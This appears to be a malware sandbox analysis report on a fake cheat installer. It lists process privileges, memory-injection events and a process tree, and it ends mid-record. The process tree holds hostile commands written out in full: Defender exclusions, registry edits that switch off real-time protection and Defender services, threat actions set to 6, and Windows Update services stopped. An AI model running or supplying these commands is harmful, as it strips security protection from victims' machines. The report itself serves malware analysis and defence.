Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2948 wrote to memory of 4596 N/A C:\Users\Admin\AppData\Local\Temp\RUN.exe C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe
PID 2948 wrote to memory of 4596 N/A C:\Users\Admin\AppData\Local\Temp\RUN.exe C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe
PID 2948 wrote to memory of 4596 N/A C:\Users\Admin\AppData\Local\Temp\RUN.exe C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe
PID 4292 wrote to memory of 3640 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 4292 wrote to memory of 3640 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 4292 wrote to memory of 3640 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 4596 wrote to memory of 4660 N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe C:\Windows\SysWOW64\msiexec.exe
PID 4596 wrote to memory of 4660 N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe C:\Windows\SysWOW64\msiexec.exe
PID 4596 wrote to memory of 4660 N/A C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe C:\Windows\SysWOW64\msiexec.exe
PID 4292 wrote to memory of 2236 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 4292 wrote to memory of 2236 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 4292 wrote to memory of 2236 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 2236 wrote to memory of 1288 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 2236 wrote to memory of 1288 N/A C:\Windows\syswow64\MsiExec.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
PID 1288 wrote to memory of 1864 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1288 wrote to memory of 1864 N/A C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\cmd.exe
PID 1864 wrote to memory of 2020 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1864 wrote to memory of 2020 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1864 wrote to memory of 2020 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1864 wrote to memory of 4176 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1864 wrote to memory of 4176 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1864 wrote to memory of 4176 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1864 wrote to memory of 4984 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1864 wrote to memory of 4984 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1864 wrote to memory of 4984 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1864 wrote to memory of 4836 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1864 wrote to memory of 4836 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1864 wrote to memory of 4836 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1864 wrote to memory of 1284 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1864 wrote to memory of 1284 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1864 wrote to memory of 1284 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1864 wrote to memory of 4768 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1864 wrote to memory of 4768 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1864 wrote to memory of 4768 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1864 wrote to memory of 2340 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1864 wrote to memory of 2340 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1864 wrote to memory of 2340 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 4292 wrote to memory of 4764 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 4292 wrote to memory of 4764 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 4292 wrote to memory of 4764 N/A C:\Windows\system32\msiexec.exe C:\Windows\syswow64\MsiExec.exe
PID 1864 wrote to memory of 4712 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1864 wrote to memory of 4712 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1864 wrote to memory of 4712 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1864 wrote to memory of 196 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1864 wrote to memory of 196 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1864 wrote to memory of 196 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1864 wrote to memory of 3940 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1864 wrote to memory of 3940 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1864 wrote to memory of 3940 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1864 wrote to memory of 428 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1864 wrote to memory of 428 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1864 wrote to memory of 428 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1864 wrote to memory of 4744 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1864 wrote to memory of 4744 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1864 wrote to memory of 4744 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1864 wrote to memory of 2020 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1864 wrote to memory of 2020 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1864 wrote to memory of 2020 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1864 wrote to memory of 3728 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1864 wrote to memory of 3728 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1864 wrote to memory of 3728 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1864 wrote to memory of 5060 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1864 wrote to memory of 5060 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE
PID 1864 wrote to memory of 5060 N/A C:\Windows\system32\cmd.exe C:\Windows\SysWOW64\PING.EXE

Uses Task Scheduler COM API

persistence

Processes

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Users\Admin\AppData\Local\Temp\RUN.exe

"C:\Users\Admin\AppData\Local\Temp\RUN.exe"

C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe

.\Install_YTTCHTs.exe

C:\Windows\system32\msiexec.exe

C:\Windows\system32\msiexec.exe /V

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding 9400D43F3FEAD939D0493164D8F02F07 C

C:\Windows\SysWOW64\msiexec.exe

"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\OpenSource\CheatInstaller 2.32\install\E957A1C\YTtSTCHEAT.msi" /quiet AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\Install_YTTCHTs.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\7zS114.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1710551043 " ALLUSERS="1"

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding B525301DA5EA43EE060767E075AFF99A

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pss532F.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msi502E.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scr502F.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scr52FF.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\progressgood.bat" "

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\syswow64\MsiExec.exe

C:\Windows\syswow64\MsiExec.exe -Embedding ECC602834DEF073A8D1A51BCDDA0588F E Global\MSI0000

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\Installer\MSID293.tmp

"C:\Windows\Installer\MSID293.tmp" /EnforcedRunAsAdmin /DontWait /RunAsAdmin /HideWindow "C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

-NoProfile -Noninteractive -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\pssD2E3.ps1" -propFile "C:\Users\Admin\AppData\Local\Temp\msiD2D1.txt" -scriptFile "C:\Users\Admin\AppData\Local\Temp\scrD2D2.ps1" -scriptArgsFile "C:\Users\Admin\AppData\Local\Temp\scrD2D3.txt" -propSep " :<->: " -lineSep " <<:>> " -testPrefix "_testValue."

C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe

"C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\D491.tmp\D4A2.tmp\D4A3.bat C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Users\Admin\Appdata\Local" -Force"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -ExclusionPath "C:\ProgramData" -Force"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -ExclusionPath "C:\Windows" -Force"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -AttackSurfaceReductionOnlyExclusions "C:\Users\Admin\Appdata\Local" -Force"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Add-MpPreference -ExclusionProcess "MsBuild.exe" -Force"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\system32\reg.exe

reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\system32\reg.exe

reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -PUAProtection disable" -Force"

C:\Windows\Installer\MSI24F.tmp

"C:\Windows\Installer\MSI24F.tmp" /EnforcedRunAsAdmin /DontWait /HideWindow "C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe"

C:\Windows\Installer\MSI250.tmp

"C:\Windows\Installer\MSI250.tmp" /EnforcedRunAsAdmin /DontWait /HideWindow "C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe"

C:\Windows\Installer\MSI251.tmp

"C:\Windows\Installer\MSI251.tmp" /EnforcedRunAsAdmin /DontWait /RunAsAdmin /HideWindow "C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe"

C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe

"C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe"

C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe

"C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\Narsil.exe"

C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe

"C:\Users\Admin\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exe"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -HighThreatDefaultAction 6 -Force"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -ModerateThreatDefaultAction 6 -Force"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -LowThreatDefaultAction 6 -Force"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Set-MpPreference -SevereThreatDefaultAction 6 -Force"

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe

C:\Users\Admin\AppData\Local\Microsoft\Vault\EdUpdMachine.exe

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1 -n 2

C:\Windows\SysWOW64\timeout.exe

timeout /t 10 /nobreak

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

